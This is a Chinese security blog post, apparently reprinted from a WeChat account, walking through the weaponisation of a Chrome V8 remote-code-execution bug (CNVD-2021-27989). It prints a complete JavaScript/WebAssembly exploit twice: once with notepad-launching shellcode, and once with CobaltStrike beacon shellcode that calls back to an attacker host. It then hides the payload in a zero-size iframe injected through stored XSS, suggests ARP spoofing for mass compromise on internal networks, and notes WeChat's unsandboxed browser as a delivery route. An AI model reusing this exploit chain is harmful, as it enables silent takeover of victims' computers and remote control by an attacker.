XSS + Chrome Rce = 上线到CobaltStrike

  • A+
所属分类:安全文章

前言


最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。但是攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。


漏洞影响范围:Google Chrome < = 89.0.4389.114。


点击链接打开记事本


该 Poc 来自于网络:

<script>   function gc() {       for (var i = 0; i < 0x80000; ++i) {           var a = new ArrayBuffer();      }  }   let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,       0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,       0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,       0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,       0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,       0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,       0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,       0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,       0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,       0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,       0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,       0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,       0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,       0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,       0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,       0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,       0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,       0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00];   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);   var wasmModule = new WebAssembly.Module(wasmCode);   var wasmInstance = new WebAssembly.Instance(wasmModule);   var main = wasmInstance.exports.main;   var bf = new ArrayBuffer(8);   var bfView = new DataView(bf);   function fLow(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(0, true));  }   function fHi(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(4, true))  }   function i2f(low, hi) {       bfView.setUint32(0, low, true);       bfView.setUint32(4, hi, true);       return bfView.getFloat64(0, true);  }   function f2big(f) {       bfView.setFloat64(0, f, true);       return bfView.getBigUint64(0, true);  }   function big2f(b) {       bfView.setBigUint64(0, b, true);       return bfView.getFloat64(0, true);  }   class LeakArrayBuffer extends ArrayBuffer {       constructor(size) {           super(size);           this.slot = 0xb33f;      }  }   function foo(a) {       let x = -1;       if (a) x = 0xFFFFFFFF;       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));       arr.shift();       let local_arr = Array(2);       local_arr[0] = 5.1;//4014666666666666       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8       arr[0] = 0x1122;       return [arr, local_arr, buff];  }   for (var i = 0; i < 0x10000; ++i)       foo(false);   gc(); gc();  [corrput_arr, rwarr, corrupt_buff] = foo(true);   corrput_arr[12] = 0x22444;   delete corrput_arr;   function setbackingStore(hi, low) {       rwarr[4] = i2f(fLow(rwarr[4]), hi);       rwarr[5] = i2f(low, fHi(rwarr[5]));  }   function leakObjLow(o) {       corrupt_buff.slot = o;       return (fLow(rwarr[9]) - 1);  }   let corrupt_view = new DataView(corrupt_buff);   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);   let idx0Addr = corrupt_buffer_ptr_low - 0x10;   let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;   let delta = baseAddr + 0x1c - idx0Addr;   if ((delta % 8) == 0) {       let baseIdx = delta / 8;       this.base = fLow(rwarr[baseIdx]);  } else {       let baseIdx = ((delta - (delta % 8)) / 8);       this.base = fHi(rwarr[baseIdx]);  }   let wasmInsAddr = leakObjLow(wasmInstance);   setbackingStore(wasmInsAddr, this.base);   let code_entry = corrupt_view.getFloat64(13 * 8, true);   setbackingStore(fLow(code_entry), fHi(code_entry));   for (let i = 0; i < shellcode.length; i++) {       corrupt_view.setUint8(i, shellcode[i]);  }   main();</script>

手动打开 Chrome 的时候关闭沙箱然后打开 poc.html 即可弹出记事本:

chrome.exe -no-sandbox



XSS + Chrome Rce = 上线到CobaltStrike


点击链接上线到 CobaltStrike


首先通过 CobaltStrike 开启一个监听器,我这边选择的是 http:

XSS + Chrome Rce = 上线到CobaltStrike

之后生成一个 C 的 shellcode(x64):

XSS + Chrome Rce = 上线到CobaltStrike

之后把生成的 Poc 中的 shellcode, 替换为 ,0  :

替换前:

XSS + Chrome Rce = 上线到CobaltStrike

替换后:


XSS + Chrome Rce = 上线到CobaltStrike

之后把 shellcode 替换到第七行里:

<script>   function gc() {       for (var i = 0; i < 0x80000; ++i) {           var a = new ArrayBuffer();      }  }   let shellcode = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xe9,0x93,0x00,0x00,0x00,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xbb,0x01,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x79,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x32,0xc0,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0xba,0x1f,0x00,0x00,0x00,0x6a,0x00,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x41,0xb9,0x04,0x00,0x00,0x00,0x41,0xba,0x75,0x46,0x9e,0x86,0xff,0xd5,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xb3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0x82,0xff,0xff,0xff,0x2f,0x59,0x39,0x58,0x73,0x00,0xe8,0x60,0x87,0xda,0xe4,0x59,0x51,0xb1,0xb9,0x07,0xcd,0xd3,0x5e,0xfb,0x13,0x18,0xa3,0xad,0xbc,0x2b,0x61,0x82,0x14,0x6e,0xb4,0x93,0x68,0xe2,0x34,0x97,0x5b,0x6e,0xec,0x4b,0x55,0xf0,0x1c,0x81,0x00,0xa6,0xce,0xac,0x72,0x9e,0xbb,0xf1,0x63,0x71,0x55,0x76,0xd2,0xce,0x43,0x0a,0xb0,0xdf,0x27,0x65,0xb7,0x9c,0xae,0x50,0x47,0x4d,0x86,0x71,0x58,0x1e,0xde,0xc2,0xf3,0xb1,0xc9,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x34,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x38,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x35,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x34,0x2e,0x30,0x29,0x0d,0x0a,0x00,0xe2,0x7f,0x5a,0x79,0x1b,0x00,0x46,0xe3,0x59,0x45,0x29,0xf4,0xbc,0x8e,0x74,0x6b,0x2e,0x3e,0x9b,0x0d,0xaf,0xa7,0x78,0xf6,0x8a,0xab,0x18,0xba,0x57,0xb0,0x64,0xc1,0x26,0x8b,0x60,0xe6,0xa4,0xdd,0x06,0x72,0xa5,0x1a,0xa5,0xd7,0x92,0x7e,0x92,0xd8,0x9d,0x15,0x68,0xb6,0x83,0x61,0x4e,0xcc,0xd6,0x69,0xb5,0xe0,0x59,0x52,0x67,0x14,0xf6,0x73,0xdb,0xe9,0x75,0xaf,0x04,0x64,0x2e,0x08,0x32,0xb7,0x6c,0xf4,0xe3,0x8f,0xa3,0x4f,0x17,0x08,0x3a,0x29,0x16,0xe4,0x1d,0x52,0x12,0xed,0xf4,0xf3,0x9a,0x8b,0xfa,0xc1,0x6f,0xab,0x3e,0xb9,0x3e,0xe2,0x34,0x73,0x96,0xa7,0xf6,0x8e,0x5f,0x6c,0xa4,0xd2,0x6a,0x70,0x33,0xdd,0xfc,0x69,0x39,0x48,0x6f,0x72,0xd2,0x22,0x5f,0x7d,0x78,0x28,0x0d,0x57,0xb3,0x28,0x2b,0xa5,0xa2,0xda,0xc1,0x23,0x2d,0x50,0x8c,0xc3,0x3e,0x81,0x03,0x3d,0x8a,0xef,0x2e,0xa7,0xea,0x33,0x21,0x56,0xb0,0x05,0x35,0xe9,0x7a,0x4d,0x72,0xa3,0xe9,0xf4,0xa7,0x32,0x02,0xd5,0xa0,0x6c,0xad,0x5d,0xf7,0x43,0x71,0x4c,0x05,0x1a,0x6e,0x75,0xf6,0xc3,0x7e,0xdc,0xda,0xed,0x5f,0x4c,0x41,0x27,0xcd,0xb2,0xbd,0xdb,0xf5,0xb9,0xa3,0x98,0x2d,0xd9,0x4b,0x5e,0x1e,0x37,0x24,0xf3,0xd1,0x08,0x5e,0xa7,0xe6,0x4d,0xc4,0x10,0xd1,0xa1,0x91,0x30,0x6d,0xc2,0x88,0xb5,0x37,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x7f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x34,0x2e,0x32,0x34,0x33,0x00,0x12,0x34,0x56,0x78];   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);   var wasmModule = new WebAssembly.Module(wasmCode);   var wasmInstance = new WebAssembly.Instance(wasmModule);   var main = wasmInstance.exports.main;   var bf = new ArrayBuffer(8);   var bfView = new DataView(bf);   function fLow(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(0, true));  }   function fHi(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(4, true))  }   function i2f(low, hi) {       bfView.setUint32(0, low, true);       bfView.setUint32(4, hi, true);       return bfView.getFloat64(0, true);  }   function f2big(f) {       bfView.setFloat64(0, f, true);       return bfView.getBigUint64(0, true);  }   function big2f(b) {       bfView.setBigUint64(0, b, true);       return bfView.getFloat64(0, true);  }   class LeakArrayBuffer extends ArrayBuffer {       constructor(size) {           super(size);           this.slot = 0xb33f;      }  }   function foo(a) {       let x = -1;       if (a) x = 0xFFFFFFFF;       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));       arr.shift();       let local_arr = Array(2);       local_arr[0] = 5.1;//4014666666666666       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8       arr[0] = 0x1122;       return [arr, local_arr, buff];  }   for (var i = 0; i < 0x10000; ++i)       foo(false);   gc(); gc();  [corrput_arr, rwarr, corrupt_buff] = foo(true);   corrput_arr[12] = 0x22444;   delete corrput_arr;   function setbackingStore(hi, low) {       rwarr[4] = i2f(fLow(rwarr[4]), hi);       rwarr[5] = i2f(low, fHi(rwarr[5]));  }   function leakObjLow(o) {       corrupt_buff.slot = o;       return (fLow(rwarr[9]) - 1);  }   let corrupt_view = new DataView(corrupt_buff);   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);   let idx0Addr = corrupt_buffer_ptr_low - 0x10;   let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;   let delta = baseAddr + 0x1c - idx0Addr;   if ((delta % 8) == 0) {       let baseIdx = delta / 8;       this.base = fLow(rwarr[baseIdx]);  } else {       let baseIdx = ((delta - (delta % 8)) / 8);       this.base = fHi(rwarr[baseIdx]);  }   let wasmInsAddr = leakObjLow(wasmInstance);   setbackingStore(wasmInsAddr, this.base);   let code_entry = corrupt_view.getFloat64(13 * 8, true);   setbackingStore(fLow(code_entry), fHi(code_entry));   for (let i = 0; i < shellcode.length; i++) {       corrupt_view.setUint8(i, shellcode[i]);  }   main();</script>

XSS + Chrome Rce = 上线到CobaltStrike

随后保存为 exp.html ,让目标打开:

XSS + Chrome Rce = 上线到CobaltStrike这个时候目标成功上线到 CobaltStrike:

XSS + Chrome Rce = 上线到CobaltStrike


XSS+Chrome Rce = 上线到CobaltStrike


    假设有一个网站存在存储XSS漏洞,可以插入这段 Payload 并加载一个远程 html 页面,若目标机器关闭了沙盒并且使用的是 Chrome 浏览器,就可导致访问此页面的人上线到 CobaltStrike。

    同时,在内网场景也可使用ARP来进行大规模PC权限的获取。

    具体使用到的标签是:

<iframe src="http://192.168.84.248/exp.html" width="0" height="0">

我把宽度和高度都设置为 0 ,这样目标就无法看到 exp.html 页面了!

演示代码:

XSS + Chrome Rce = 上线到CobaltStrike

其中 http://192.168.84.248/exp.html 是攻击者构造好的恶意页面,当我们访问到了被插入 XSS Payload 的页面,就会自动加载 exp.html 成功上线到 CobaltStrike:

XSS + Chrome Rce = 上线到CobaltStrike

XSS + Chrome Rce = 上线到CobaltStrike

思路大家可自由延伸。


Windows版微信加载JS运行Shellcode


通过微信点击URL链接,过程中会调用微信内置浏览器(chrome内核,并开启了--no-sandbox参数)。针对chrome漏洞利用的js代码成功执行后,shellcode将启动远控进程,最终获取该PC当前用户权限。


Chrome安全问题可能导致Windows版微信任意代码执行漏洞

组件: Windows版微信

漏洞类型: 远程代码执行

影响: PC接管

简述: 攻击者可以通过微信发送一个特制的web链接,用户一旦点击链接,Windows版微信便会加载执行攻击者构造恶意代码,最终使攻击者控制用户PC。

 Tencnet:Windows版微信: 小于等于3.2.1.141版本修复建议

通用修补建议

目前微信已经修复漏洞并发布了更新版本,建议用户立即将Windows版微信更新到3.2.1.141以上的最新版本

InBug-实验室


官网:https://www.inbug.org/

InScan内网扫描器:https://github.com/inbug-team/InScan

本文始发于微信公众号(爱国小白帽):XSS + Chrome Rce = 上线到CobaltStrike

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: